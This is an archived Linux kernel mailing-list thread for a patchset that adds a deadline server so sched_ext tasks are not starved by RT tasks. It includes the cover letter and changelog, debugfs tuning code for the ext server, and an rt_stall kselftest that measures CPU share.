[PATCHSET v12 sched_ext/for-6.20] Add a deadline server for sched_ext tasks
sched_ext tasks can be starved by long-running RT tasks, especially since
RT throttling was replaced by deadline servers to boost only SCHED_NORMAL
tasks.
Several users in the community have reported issues with RT stalling
sched_ext tasks. This is fairly common on distributions or environments
where applications like video compositors, audio services, etc. run as RT
tasks by default.
Example trace (showing a per-CPU kthread stalled due to the sway Wayland
compositor running as an RT task):
runnable task stall (kworker/0:0[106377] failed to run for 5.043s)
...
CPU 0 : nr_run=3 flags=0xd cpu_rel=0 ops_qseq=20646200 pnt_seq=45388738
curr=sway[994] class=rt_sched_class
R kworker/0:0[106377] -5043ms
scx_state/flags=3/0x1 dsq_flags=0x0 ops_state/qseq=0/0
sticky/holding_cpu=-1/-1 dsq_id=0x8000000000000002 dsq_vtime=0 slice=20000000
cpus=01
This is often perceived as a bug in the BPF schedulers, but in reality they
can't do much: RT tasks run outside their control and can potentially
consume 100% of the CPU bandwidth.
Fix this by adding a sched_ext deadline server, so that sched_ext tasks are
also boosted and do not suffer starvation.
Two kselftests are also provided to verify that the starvation fix works
and that bandwidth allocation is correct.
== Design ==
- The EXT server is initialized at boot time and remains configured
throughout the system's lifetime
- It starts automatically when the first sched_ext task is enqueued
(rq->scx.nr_running == 1)
- The server's pick function (ext_server_pick_task) always selects
sched_ext tasks when active
- Runtime accounting happens in update_curr_scx() during task execution
and update_curr_idle() when idle
- Bandwidth accounting includes both fair and ext servers in root domain
calculations
- A debugfs interface (/sys/kernel/debug/sched/ext_server/) allows runtime
tuning of server parameters (see notes below)
== Notes ==
1) As discussed during the sched_ext microconference at LPC Tokyo, the plan
is to start with a simple approach, avoiding automatically creating or
tearing down the EXT server bandwidth reservation when a BPF scheduler is
loaded or unloaded. Instead, the reservation is kept permanently active.
This significantly simplifies the logic while still addressing the
starvation issue.
Any fine-tuning of the bandwidth reservation is delegated to the system
administrator, who can adjust it via the debugfs interface. In the future,
a more suitable interface can be introduced and automatic removal of the
reservation when the BPF scheduler is unloaded can be revisited.
A better interface to adjust the dl_server bandwidth reservation can be
discussed at the upcoming OSPM
(https://lore.kernel.org/lkml/aULDwbALUj0V7cVk@jlelli-thinkpadt14gen4.remote.csb/).
2) IMPORTANT: this patch set requires [1] to function properly (sent
separately, not included in this series).
[1] https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/
This patchset is also available in the following git branch:
git://git.kernel.org/pub/scm/linux/kernel/git/arighi/linux.git scx-dl-server
Changes in v12:
- Move dl_server execution state reset on stop fix to a separate patch
(https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/)
- Removed per-patch changelog (keeping a global changelog here)
- Link to v11: https://lore.kernel.org/all/20260120215808.188032-1-arighi@nvidia.com/
Changes in v11:
- do not create/remove the bandwidth reservation for the ext server when a
BPF scheduler is loaded/unloaded, but keep the bandwidth reservation
always active
- change rt_stall kselftest to validate both FAIR and EXT DL servers
- Link to v10: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v10:
- reordered patches to better isolate sched_ext changes vs sched/deadline
changes (Andrea Righi)
- define ext_server only with CONFIG_SCHED_CLASS_EXT=y (Andrea Righi)
- add WARN_ON_ONCE(!cpus) check in dl_server_apply_params() (Andrea Righi)
- wait for inactive_task_timer to fire before removing the bandwidth
reservation (Juri Lelli)
- remove explicit dl_server_stop() in dequeue_task_scx() to reduce timer
reprogramming overhead (Juri Lelli)
- do not restart pick_task() when invoked by the dl_server (Tejun Heo)
- rename rq_dl_server to dl_server (Peter Zijlstra)
- fixed a missing dl_server start in dl_server_on() (Christian Loehle)
- add a comment to the rt_stall selftest to better explain the 4%
threshold (Emil Tsalapatis)
- Link to v9: https://lore.kernel.org/all/20251017093214.70029-1-arighi@nvidia.com/
Changes in v9:
- Drop the ->balance() logic as its functionality is now integrated into
->pick_task(), allowing dl_server to call pick_task_scx() directly
- Link to v8: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v8:
- Add tj's patch to de-couple balance and pick_task and avoid changing
sched/core callbacks to propagate @rf
- Simplify dl_se->dl_server check (suggested by PeterZ)
- Small coding style fixes in the kselftests
- Link to v7: https://lore.kernel.org/all/20250809184800.129831-1-joelagnelf@nvidia.com/
Changes in v7:
- Rebased to Linus master
- Link to v6: https://lore.kernel.org/all/20250702232944.3221001-1-joelagnelf@nvidia.com/
Changes in v6:
- Added Acks to a few patches
- Fixed a few nits suggested by Tejun
- Link to v5: https://lore.kernel.org/all/20250620203234.3349930-1-joelagnelf@nvidia.com/
Changes in v5:
- Added a kselftest (total_bw) to sched_ext to verify bandwidth values
from debugfs
- Address comment from Andrea about redundant rq clock invalidation
- Link to v4: https://lore.kernel.org/all/20250617200523.1261231-1-joelagnelf@nvidia.com/
Changes in v4:
- Fixed issues with hotplugged CPUs having their DL server bandwidth
altered due to loading SCX
- Fixed other issues
- Rebased on Linus master
- All sched_ext kselftests reliably pass now, also verified that the
total_bw in debugfs (CONFIG_SCHED_DEBUG) is conserved with these patches
- Link to v3: https://lore.kernel.org/all/20250613051734.4023260-1-joelagnelf@nvidia.com/
Changes in v3:
- Removed code duplication in debugfs. Made ext interface separate
- Fixed issue where rq_lock_irqsave was not used in the relinquish patch
- Fixed running bw accounting issue in dl_server_remove_params
- Link to v2: https://lore.kernel.org/all/20250602180110.816225-1-joelagnelf@nvidia.com/
Changes in v2:
- Fixed a hang related to using rq_lock instead of rq_lock_irqsave
- Added support to remove BW of DL servers when they are switched to/from EXT
- Link to v1: https://lore.kernel.org/all/20250315022158.2354454-1-joelagnelf@nvidia.com/
Andrea Righi (2):
sched_ext: Add a DL server for sched_ext tasks
selftests/sched_ext: Add test for sched_ext dl_server
Joel Fernandes (5):
sched/deadline: Clear the defer params
sched/debug: Fix updating of ppos on server write ops
sched/debug: Stop and start server based on if it was active
sched/debug: Add support to change sched_ext server params
selftests/sched_ext: Add test for DL server total_bw consistency
kernel/sched/core.c | 6 +
kernel/sched/deadline.c | 86 +++++--
kernel/sched/debug.c | 171 +++++++++++---
kernel/sched/ext.c | 33 +++
kernel/sched/idle.c | 3 +
kernel/sched/sched.h | 2 +
kernel/sched/topology.c | 5 +
tools/testing/selftests/sched_ext/Makefile | 2 +
tools/testing/selftests/sched_ext/rt_stall.bpf.c | 23 ++
tools/testing/selftests/sched_ext/rt_stall.c | 240 +++++++++++++++++++
tools/testing/selftests/sched_ext/total_bw.c | 281 +++++++++++++++++++++++
11 files changed, 801 insertions(+), 51 deletions(-)
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.bpf.c
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.c
create mode 100644 tools/testing/selftests/sched_ext/total_bw.c
sched/debug: Add support to change sched_ext server params
From: Joel Fernandes <joelagnelf@nvidia.com>
When a sched_ext scheduler is loaded, tasks in the fair class are
automatically moved to the sched_ext class. Add support to modify the
ext server parameters similar to how the fair server parameters are
modified.
Re-use common code between ext and fair servers as needed.
Tested-by: Christian Loehle <christian.loehle@arm.com>
Reviewed-by: Juri Lelli <juri.lelli@redhat.com>
Co-developed-by: Andrea Righi <arighi@nvidia.com>
Signed-off-by: Andrea Righi <arighi@nvidia.com>
Signed-off-by: Joel Fernandes <joelagnelf@nvidia.com>
---
kernel/sched/debug.c | 157 ++++++++++++++++++++++++++++++++++++-------
1 file changed, 133 insertions(+), 24 deletions(-)
diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
index dd793f8f3858a..2e9896668c6fd 100644
--- a/kernel/sched/debug.c
+++ b/kernel/sched/debug.c
@@ -336,14 +336,16 @@ enum dl_param {
DL_PERIOD,
};
-static unsigned long fair_server_period_max = (1UL << 22) * NSEC_PER_USEC; /* ~4 seconds */
-static unsigned long fair_server_period_min = (100) * NSEC_PER_USEC; /* 100 us */
+static unsigned long dl_server_period_max = (1UL << 22) * NSEC_PER_USEC; /* ~4 seconds */
+static unsigned long dl_server_period_min = (100) * NSEC_PER_USEC; /* 100 us */
-static ssize_t sched_fair_server_write(struct file *filp, const char __user *ubuf,
- size_t cnt, loff_t *ppos, enum dl_param param)
+static ssize_t sched_server_write_common(struct file *filp, const char __user *ubuf,
+ size_t cnt, loff_t *ppos, enum dl_param param,
+ void *server)
{
long cpu = (long) ((struct seq_file *) filp->private_data)->private;
struct rq *rq = cpu_rq(cpu);
+ struct sched_dl_entity *dl_se = (struct sched_dl_entity *)server;
u64 runtime, period;
int retval = 0;
size_t err;
@@ -356,8 +358,8 @@ static ssize_t sched_fair_server_write(struct file *filp, const char __user *ubu
scoped_guard (rq_lock_irqsave, rq) {
bool is_active;
- runtime = rq->fair_server.dl_runtime;
- period = rq->fair_server.dl_period;
+ runtime = dl_se->dl_runtime;
+ period = dl_se->dl_period;
switch (param) {
case DL_RUNTIME:
@@ -373,25 +375,25 @@ static ssize_t sched_fair_server_write(struct file *filp, const char __user *ubu
}
if (runtime > period ||
- period > fair_server_period_max ||
- period < fair_server_period_min) {
+ period > dl_server_period_max ||
+ period < dl_server_period_min) {
return -EINVAL;
}
- is_active = dl_server_active(&rq->fair_server);
+ is_active = dl_server_active(dl_se);
if (is_active) {
update_rq_clock(rq);
- dl_server_stop(&rq->fair_server);
+ dl_server_stop(dl_se);
}
- retval = dl_server_apply_params(&rq->fair_server, runtime, period, 0);
+ retval = dl_server_apply_params(dl_se, runtime, period, 0);
if (!runtime)
- printk_deferred("Fair server disabled in CPU %d, system may crash due to starvation.\n",
- cpu_of(rq));
+ printk_deferred("%s server disabled in CPU %d, system may crash due to starvation.\n",
+ server == &rq->fair_server ? "Fair" : "Ext", cpu_of(rq));
if (is_active && runtime)
- dl_server_start(&rq->fair_server);
+ dl_server_start(dl_se);
if (retval < 0)
return retval;
@@ -401,36 +403,42 @@ static ssize_t sched_fair_server_write(struct file *filp, const char __user *ubu
return cnt;
}
-static size_t sched_fair_server_show(struct seq_file *m, void *v, enum dl_param param)
+static size_t sched_server_show_common(struct seq_file *m, void *v, enum dl_param param,
+ void *server)
{
- unsigned long cpu = (unsigned long) m->private;
- struct rq *rq = cpu_rq(cpu);
+ struct sched_dl_entity *dl_se = (struct sched_dl_entity *)server;
u64 value;
switch (param) {
case DL_RUNTIME:
- value = rq->fair_server.dl_runtime;
+ value = dl_se->dl_runtime;
break;
case DL_PERIOD:
- value = rq->fair_server.dl_period;
+ value = dl_se->dl_period;
break;
}
seq_printf(m, "%llu\n", value);
return 0;
-
}
static ssize_t
sched_fair_server_runtime_write(struct file *filp, const char __user *ubuf,
size_t cnt, loff_t *ppos)
{
- return sched_fair_server_write(filp, ubuf, cnt, ppos, DL_RUNTIME);
+ long cpu = (long) ((struct seq_file *) filp->private_data)->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_write_common(filp, ubuf, cnt, ppos, DL_RUNTIME,
+ &rq->fair_server);
}
static int sched_fair_server_runtime_show(struct seq_file *m, void *v)
{
- return sched_fair_server_show(m, v, DL_RUNTIME);
+ unsigned long cpu = (unsigned long) m->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_show_common(m, v, DL_RUNTIME, &rq->fair_server);
}
static int sched_fair_server_runtime_open(struct inode *inode, struct file *filp)
@@ -446,16 +454,57 @@ static const struct file_operations fair_server_runtime_fops = {
.release = single_release,
};
+#ifdef CONFIG_SCHED_CLASS_EXT
+static ssize_t
+sched_ext_server_runtime_write(struct file *filp, const char __user *ubuf,
+ size_t cnt, loff_t *ppos)
+{
+ long cpu = (long) ((struct seq_file *) filp->private_data)->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_write_common(filp, ubuf, cnt, ppos, DL_RUNTIME,
+ &rq->ext_server);
+}
+
+static int sched_ext_server_runtime_show(struct seq_file *m, void *v)
+{
+ unsigned long cpu = (unsigned long) m->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_show_common(m, v, DL_RUNTIME, &rq->ext_server);
+}
+
+static int sched_ext_server_runtime_open(struct inode *inode, struct file *filp)
+{
+ return single_open(filp, sched_ext_server_runtime_show, inode->i_private);
+}
+
+static const struct file_operations ext_server_runtime_fops = {
+ .open = sched_ext_server_runtime_open,
+ .write = sched_ext_server_runtime_write,
+ .read = seq_read,
+ .llseek = seq_lseek,
+ .release = single_release,
+};
+#endif /* CONFIG_SCHED_CLASS_EXT */
+
static ssize_t
sched_fair_server_period_write(struct file *filp, const char __user *ubuf,
size_t cnt, loff_t *ppos)
{
- return sched_fair_server_write(filp, ubuf, cnt, ppos, DL_PERIOD);
+ long cpu = (long) ((struct seq_file *) filp->private_data)->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_write_common(filp, ubuf, cnt, ppos, DL_PERIOD,
+ &rq->fair_server);
}
static int sched_fair_server_period_show(struct seq_file *m, void *v)
{
- return sched_fair_server_show(m, v, DL_PERIOD);
+ unsigned long cpu = (unsigned long) m->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_show_common(m, v, DL_PERIOD, &rq->fair_server);
}
static int sched_fair_server_period_open(struct inode *inode, struct file *filp)
@@ -471,6 +520,40 @@ static const struct file_operations fair_server_period_fops = {
.release = single_release,
};
+#ifdef CONFIG_SCHED_CLASS_EXT
+static ssize_t
+sched_ext_server_period_write(struct file *filp, const char __user *ubuf,
+ size_t cnt, loff_t *ppos)
+{
+ long cpu = (long) ((struct seq_file *) filp->private_data)->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_write_common(filp, ubuf, cnt, ppos, DL_PERIOD,
+ &rq->ext_server);
+}
+
+static int sched_ext_server_period_show(struct seq_file *m, void *v)
+{
+ unsigned long cpu = (unsigned long) m->private;
+ struct rq *rq = cpu_rq(cpu);
+
+ return sched_server_show_common(m, v, DL_PERIOD, &rq->ext_server);
+}
+
+static int sched_ext_server_period_open(struct inode *inode, struct file *filp)
+{
+ return single_open(filp, sched_ext_server_period_show, inode->i_private);
+}
+
+static const struct file_operations ext_server_period_fops = {
+ .open = sched_ext_server_period_open,
+ .write = sched_ext_server_period_write,
+ .read = seq_read,
+ .llseek = seq_lseek,
+ .release = single_release,
+};
+#endif /* CONFIG_SCHED_CLASS_EXT */
+
static struct dentry *debugfs_sched;
static void debugfs_fair_server_init(void)
@@ -494,6 +577,29 @@ static void debugfs_fair_server_init(void)
}
}
+#ifdef CONFIG_SCHED_CLASS_EXT
+static void debugfs_ext_server_init(void)
+{
+ struct dentry *d_ext;
+ unsigned long cpu;
+
+ d_ext = debugfs_create_dir("ext_server", debugfs_sched);
+ if (!d_ext)
+ return;
+
+ for_each_possible_cpu(cpu) {
+ struct dentry *d_cpu;
+ char buf[32];
+
+ snprintf(buf, sizeof(buf), "cpu%lu", cpu);
+ d_cpu = debugfs_create_dir(buf, d_ext);
+
+ debugfs_create_file("runtime", 0644, d_cpu, (void *) cpu, &ext_server_runtime_fops);
+ debugfs_create_file("period", 0644, d_cpu, (void *) cpu, &ext_server_period_fops);
+ }
+}
+#endif /* CONFIG_SCHED_CLASS_EXT */
+
static __init int sched_init_debug(void)
{
struct dentry __maybe_unused *numa;
@@ -532,6 +638,9 @@ static __init int sched_init_debug(void)
debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
debugfs_fair_server_init();
+#ifdef CONFIG_SCHED_CLASS_EXT
+ debugfs_ext_server_init();
+#endif
return 0;
}
--
2.52.0
{
"author": "Andrea Righi <arighi@nvidia.com>",
"date": "Mon, 26 Jan 2026 10:59:03 +0100",
"thread_id": "aYDUqdQquFcqj7rQ@slm.duckdns.org.mbox.gz"
}
selftests/sched_ext: Add test for sched_ext dl_server
Add a selftest to validate the correct behavior of the deadline server
for the ext_sched_class.
Reviewed-by: Emil Tsalapatis <emil@etsalapatis.com>
Tested-by: Christian Loehle <christian.loehle@arm.com>
Co-developed-by: Joel Fernandes <joelagnelf@nvidia.com>
Signed-off-by: Joel Fernandes <joelagnelf@nvidia.com>
Signed-off-by: Andrea Righi <arighi@nvidia.com>
---
tools/testing/selftests/sched_ext/Makefile | 1 +
.../selftests/sched_ext/rt_stall.bpf.c | 23 ++
tools/testing/selftests/sched_ext/rt_stall.c | 240 ++++++++++++++++++
3 files changed, 264 insertions(+)
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.bpf.c
create mode 100644 tools/testing/selftests/sched_ext/rt_stall.c
diff --git a/tools/testing/selftests/sched_ext/Makefile b/tools/testing/selftests/sched_ext/Makefile
index 5fe45f9c5f8fd..c9255d1499b6e 100644
--- a/tools/testing/selftests/sched_ext/Makefile
+++ b/tools/testing/selftests/sched_ext/Makefile
@@ -183,6 +183,7 @@ auto-test-targets := \
select_cpu_dispatch_bad_dsq \
select_cpu_dispatch_dbl_dsp \
select_cpu_vtime \
+ rt_stall \
test_example \
testcase-targets := $(addsuffix .o,$(addprefix $(SCXOBJ_DIR)/,$(auto-test-targets)))
diff --git a/tools/testing/selftests/sched_ext/rt_stall.bpf.c b/tools/testing/selftests/sched_ext/rt_stall.bpf.c
new file mode 100644
index 0000000000000..80086779dd1eb
--- /dev/null
+++ b/tools/testing/selftests/sched_ext/rt_stall.bpf.c
@@ -0,0 +1,23 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * A scheduler that verifies whether RT tasks can stall SCHED_EXT tasks.
+ *
+ * Copyright (c) 2025 NVIDIA Corporation.
+ */
+
+#include <scx/common.bpf.h>
+
+char _license[] SEC("license") = "GPL";
+
+UEI_DEFINE(uei);
+
+void BPF_STRUCT_OPS(rt_stall_exit, struct scx_exit_info *ei)
+{
+ UEI_RECORD(uei, ei);
+}
+
+SEC(".struct_ops.link")
+struct sched_ext_ops rt_stall_ops = {
+ .exit = (void *)rt_stall_exit,
+ .name = "rt_stall",
+};
diff --git a/tools/testing/selftests/sched_ext/rt_stall.c b/tools/testing/selftests/sched_ext/rt_stall.c
new file mode 100644
index 0000000000000..015200f80f6e2
--- /dev/null
+++ b/tools/testing/selftests/sched_ext/rt_stall.c
@@ -0,0 +1,240 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * Copyright (c) 2025 NVIDIA Corporation.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sched.h>
+#include <sys/prctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <linux/sched.h>
+#include <signal.h>
+#include <bpf/bpf.h>
+#include <scx/common.h>
+#include <unistd.h>
+#include "rt_stall.bpf.skel.h"
+#include "scx_test.h"
+#include "../kselftest.h"
+
+#define CORE_ID 0 /* CPU to pin tasks to */
+#define RUN_TIME 5 /* How long to run the test in seconds */
+
+/* Simple busy-wait function for test tasks */
+static void process_func(void)
+{
+ while (1) {
+ /* Busy wait */
+ for (volatile unsigned long i = 0; i < 10000000UL; i++)
+ ;
+ }
+}
+
+/* Set CPU affinity to a specific core */
+static void set_affinity(int cpu)
+{
+ cpu_set_t mask;
+
+ CPU_ZERO(&mask);
+ CPU_SET(cpu, &mask);
+ if (sched_setaffinity(0, sizeof(mask), &mask) != 0) {
+ perror("sched_setaffinity");
+ exit(EXIT_FAILURE);
+ }
+}
+
+/* Set task scheduling policy and priority */
+static void set_sched(int policy, int priority)
+{
+ struct sched_param param;
+
+ param.sched_priority = priority;
+ if (sched_setscheduler(0, policy, &param) != 0) {
+ perror("sched_setscheduler");
+ exit(EXIT_FAILURE);
+ }
+}
+
+/* Get process runtime from /proc/<pid>/stat */
+static float get_process_runtime(int pid)
+{
+ char path[256];
+ FILE *file;
+ long utime, stime;
+ int fields;
+
+ snprintf(path, sizeof(path), "/proc/%d/stat", pid);
+ file = fopen(path, "r");
+ if (file == NULL) {
+ perror("Failed to open stat file");
+ return -1;
+ }
+
+ /* Skip the first 13 fields and read the 14th and 15th */
+ fields = fscanf(file,
+ "%*d %*s %*c %*d %*d %*d %*d %*d %*u %*u %*u %*u %*u %lu %lu",
+ &utime, &stime);
+ fclose(file);
+
+ if (fields != 2) {
+ fprintf(stderr, "Failed to read stat file\n");
+ return -1;
+ }
+
+ /* Calculate the total time spent in the process */
+ long total_time = utime + stime;
+ long ticks_per_second = sysconf(_SC_CLK_TCK);
+ float runtime_seconds = total_time * 1.0 / ticks_per_second;
+
+ return runtime_seconds;
+}
+
+static enum scx_test_status setup(void **ctx)
+{
+ struct rt_stall *skel;
+
+ skel = rt_stall__open();
+ SCX_FAIL_IF(!skel, "Failed to open");
+ SCX_ENUM_INIT(skel);
+ SCX_FAIL_IF(rt_stall__load(skel), "Failed to load skel");
+
+ *ctx = skel;
+
+ return SCX_TEST_PASS;
+}
+
+static bool sched_stress_test(bool is_ext)
+{
+ /*
+ * We're expecting the EXT task to get around 5% of CPU time when
+ * competing with the RT task (small 1% fluctuations are expected).
+ *
+ * However, the EXT task should get at least 4% of the CPU to prove
+ * that the EXT deadline server is working correctly. A percentage
+ * less than 4% indicates a bug where RT tasks can potentially
+ * stall SCHED_EXT tasks, causing the test to fail.
+ */
+ const float expected_min_ratio = 0.04; /* 4% */
+ const char *class_str = is_ext ? "EXT" : "FAIR";
+
+ float ext_runtime, rt_runtime, actual_ratio;
+ int ext_pid, rt_pid;
+
+ ksft_print_header();
+ ksft_set_plan(1);
+
+ /* Create and set up an EXT task */
+ ext_pid = fork();
+ if (ext_pid == 0) {
+ set_affinity(CORE_ID);
+ process_func();
+ exit(0);
+ } else if (ext_pid < 0) {
+ perror("fork task");
+ ksft_exit_fail();
+ }
+
+ /* Create an RT task */
+ rt_pid = fork();
+ if (rt_pid == 0) {
+ set_affinity(CORE_ID);
+ set_sched(SCHED_FIFO, 50);
+ process_func();
+ exit(0);
+ } else if (rt_pid < 0) {
+ perror("fork for RT task");
+ ksft_exit_fail();
+ }
+
+ /* Let the processes run for the specified time */
+ sleep(RUN_TIME);
+
+ /* Get runtime for the EXT task */
+ ext_runtime = get_process_runtime(ext_pid);
+ if (ext_runtime == -1)
+ ksft_exit_fail_msg("Error getting runtime for %s task (PID %d)\n",
+ class_str, ext_pid);
+ ksft_print_msg("Runtime of %s task (PID %d) is %f seconds\n",
+ class_str, ext_pid, ext_runtime);
+
+ /* Get runtime for the RT task */
+ rt_runtime = get_process_runtime(rt_pid);
+ if (rt_runtime == -1)
+ ksft_exit_fail_msg("Error getting runtime for RT task (PID %d)\n", rt_pid);
+ ksft_print_msg("Runtime of RT task (PID %d) is %f seconds\n", rt_pid, rt_runtime);
+
+ /* Kill the processes */
+ kill(ext_pid, SIGKILL);
+ kill(rt_pid, SIGKILL);
+ waitpid(ext_pid, NULL, 0);
+ waitpid(rt_pid, NULL, 0);
+
+ /* Verify that the scx task got enough runtime */
+ actual_ratio = ext_runtime / (ext_runtime + rt_runtime);
+ ksft_print_msg("%s task got %.2f%% of total runtime\n",
+ class_str, actual_ratio * 100);
+
+ if (actual_ratio >= expected_min_ratio) {
+ ksft_test_result_pass("PASS: %s task got more than %.2f%% of runtime\n",
+ class_str, expected_min_ratio * 100);
+ return true;
+ }
+ ksft_test_result_fail("FAIL: %s task got less than %.2f%% of runtime\n",
+ class_str, expected_min_ratio * 100);
+ return false;
+}
+
+static enum scx_test_status run(void *ctx)
+{
+ struct rt_stall *skel = ctx;
+ struct bpf_link *link = NULL;
+ bool res;
+ int i;
+
+ /*
+ * Test if the dl_server is working both with and without the
+ * sched_ext scheduler attached.
+ *
+ * This ensures all the scenarios are covered:
+ * - fair_server stop -> ext_server start
+ * - ext_server stop -> fair_server start
+ */
+ for (i = 0; i < 4; i++) {
+ bool is_ext = i % 2;
+
+ if (is_ext) {
+ memset(&skel->data->uei, 0, sizeof(skel->data->uei));
+ link = bpf_map__attach_struct_ops(skel->maps.rt_stall_ops);
+ SCX_FAIL_IF(!link, "Failed to attach scheduler");
+ }
+ res = sched_stress_test(is_ext);
+ if (is_ext) {
+ SCX_EQ(skel->data->uei.kind, EXIT_KIND(SCX_EXIT_NONE));
+ bpf_link__destroy(link);
+ }
+
+ if (!res)
+ ksft_exit_fail();
+ }
+
+ return SCX_TEST_PASS;
+}
+
+static void cleanup(void *ctx)
+{
+ struct rt_stall *skel = ctx;
+
+ rt_stall__destroy(skel);
+}
+
+struct scx_test rt_stall = {
+ .name = "rt_stall",
+ .description = "Verify that RT tasks cannot stall SCHED_EXT tasks",
+ .setup = setup,
+ .run = run,
+ .cleanup = cleanup,
+};
+REGISTER_SCX_TEST(&rt_stall)
--
2.52.0
|
{
"author": "Andrea Righi <arighi@nvidia.com>",
"date": "Mon, 26 Jan 2026 10:59:04 +0100",
"thread_id": "aYDUqdQquFcqj7rQ@slm.duckdns.org.mbox.gz"
}
|
lkml
|
[PATCHSET v12 sched_ext/for-6.20] Add a deadline server for sched_ext tasks
|
sched_ext tasks can be starved by long-running RT tasks, especially since
RT throttling was replaced by deadline servers to boost only SCHED_NORMAL
tasks.
Several users in the community have reported issues with RT stalling
sched_ext tasks. This is fairly common on distributions or environments
where applications like video compositors, audio services, etc. run as RT
tasks by default.
Example trace (showing a per-CPU kthread stalled due to the sway Wayland
compositor running as an RT task):
runnable task stall (kworker/0:0[106377] failed to run for 5.043s)
...
CPU 0 : nr_run=3 flags=0xd cpu_rel=0 ops_qseq=20646200 pnt_seq=45388738
curr=sway[994] class=rt_sched_class
R kworker/0:0[106377] -5043ms
scx_state/flags=3/0x1 dsq_flags=0x0 ops_state/qseq=0/0
sticky/holding_cpu=-1/-1 dsq_id=0x8000000000000002 dsq_vtime=0 slice=20000000
cpus=01
This is often perceived as a bug in the BPF schedulers, but in reality they
can't do much: RT tasks run outside their control and can potentially
consume 100% of the CPU bandwidth.
Fix this by adding a sched_ext deadline server, so that sched_ext tasks are
also boosted and do not suffer starvation.
Two kselftests are also provided to verify the starvation fixes and
bandwidth allocation is correct.
== Design ==
- The EXT server is initialized at boot time and remains configured
throughout the system's lifetime
- It starts automatically when the first sched_ext task is enqueued
(rq->scx.nr_running == 1)
- The server's pick function (ext_server_pick_task) always selects
sched_ext tasks when active
- Runtime accounting happens in update_curr_scx() during task execution
and update_curr_idle() when idle
- Bandwidth accounting includes both fair and ext servers in root domain
calculations
- A debugfs interface (/sys/kernel/debug/sched/ext_server/) allows runtime
tuning of server parameters (see notes below)
== Notes ==
1) As discussed during the sched_ext microconference at LPC Tokyo, the plan
is to start with a simple approach, avoiding automatically creating or
tearing down the EXT server bandwidth reservation when a BPF scheduler is
loaded or unloaded. Instead, the reservation is kept permanently active.
This significantly simplifies the logic while still addressing the
starvation issue.
Any fine-tuning of the bandwidth reservation is delegated to the system
administrator, who can adjust it via the debugfs interface. In the future,
a more suitable interface can be introduced and automatic removal of the
reservation when the BPF scheduler is unloaded can be revisited.
A better interface to adjust the dl_server bandwidth reservation can be
discussed at the upcoming OSPM
(https://lore.kernel.org/lkml/aULDwbALUj0V7cVk@jlelli-thinkpadt14gen4.remote.csb/).
2) IMPORTANT: this patch requires [1] to function properly (sent
separately, not included in this patch set).
[1] https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/
This patchset is also available in the following git branch:
git://git.kernel.org/pub/scm/linux/kernel/git/arighi/linux.git scx-dl-server
Changes in v12:
- Move dl_server execution state reset on stop fix to a separate patch
(https://lore.kernel.org/all/20260123161645.2181752-1-arighi@nvidia.com/)
- Removed per-patch changelog (keeping a global changelog here)
- Link to v11: https://lore.kernel.org/all/20260120215808.188032-1-arighi@nvidia.com/
Changes in v11:
- do not create/remove the bandwidth reservation for the ext server when a
BPF scheduler is loaded/unloaded, but keep the bandwidth reservation
always active
- change rt_stall kselftest to validate both FAIR and EXT DL servers
- Link to v10: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v10:
- reordered patches to better isolate sched_ext changes vs sched/deadline
changes (Andrea Righi)
- define ext_server only with CONFIG_SCHED_CLASS_EXT=y (Andrea Righi)
- add WARN_ON_ONCE(!cpus) check in dl_server_apply_params() (Andrea Righi)
- wait for inactive_task_timer to fire before removing the bandwidth
reservation (Juri Lelli)
- remove explicit dl_server_stop() in dequeue_task_scx() to reduce timer
reprogramming overhead (Juri Lelli)
- do not restart pick_task() when invoked by the dl_server (Tejun Heo)
- rename rq_dl_server to dl_server (Peter Zijlstra)
- fixed a missing dl_server start in dl_server_on() (Christian Loehle)
- add a comment to the rt_stall selftest to better explain the 4%
threshold (Emil Tsalapatis)
- Link to v9: https://lore.kernel.org/all/20251017093214.70029-1-arighi@nvidia.com/
Changes in v9:
- Drop the ->balance() logic as its functionality is now integrated into
->pick_task(), allowing dl_server to call pick_task_scx() directly
- Link to v8: https://lore.kernel.org/all/20250903095008.162049-1-arighi@nvidia.com/
Changes in v8:
- Add tj's patch to de-couple balance and pick_task and avoid changing
sched/core callbacks to propagate @rf
- Simplify dl_se->dl_server check (suggested by PeterZ)
- Small coding style fixes in the kselftests
- Link to v7: https://lore.kernel.org/all/20250809184800.129831-1-joelagnelf@nvidia.com/
Changes in v7:
- Rebased to Linus master
- Link to v6: https://lore.kernel.org/all/20250702232944.3221001-1-joelagnelf@nvidia.com/
Changes in v6:
- Added Acks to a few patches
- Fixed a few nits suggested by Tejun
- Link to v5: https://lore.kernel.org/all/20250620203234.3349930-1-joelagnelf@nvidia.com/
Changes in v5:
- Added a kselftest (total_bw) to sched_ext to verify bandwidth values
from debugfs
- Address comment from Andrea about redundant rq clock invalidation
- Link to v4: https://lore.kernel.org/all/20250617200523.1261231-1-joelagnelf@nvidia.com/
Changes in v4:
- Fixed issues with hotplugged CPUs having their DL server bandwidth
altered due to loading SCX
- Fixed other issues
- Rebased on Linus master
- All sched_ext kselftests reliably pass now, also verified that the
total_bw in debugfs (CONFIG_SCHED_DEBUG) is conserved with these patches
- Link to v3: https://lore.kernel.org/all/20250613051734.4023260-1-joelagnelf@nvidia.com/
